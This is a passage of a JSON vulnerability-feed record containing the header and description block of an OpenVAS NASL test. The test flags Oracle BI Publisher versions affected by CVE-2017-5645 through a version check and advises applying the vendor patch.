"OPENVAS:1361412562310814409", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814409", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle BI Publisher Code Execution Vulnerability (oct2018-4428296)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:oracle:business_intelligence_publisher\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814409\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2017-5645\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-18 16:42:53 +0530 (Thu, 18 Oct 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Oracle BI Publisher Code Execution Vulnerability (oct2018-4428296)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle BI Publisher\n and is prone to a code execution 
vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Check if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist due to an unspecified\n error in BI Publisher Security (Apache Log4j) component.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Oracle BI Publisher versions 11.1.1.7.0,\n 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0\");\n\n script_tag(name:\"solution\", value:\"Apply the latest patch from vendor. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFi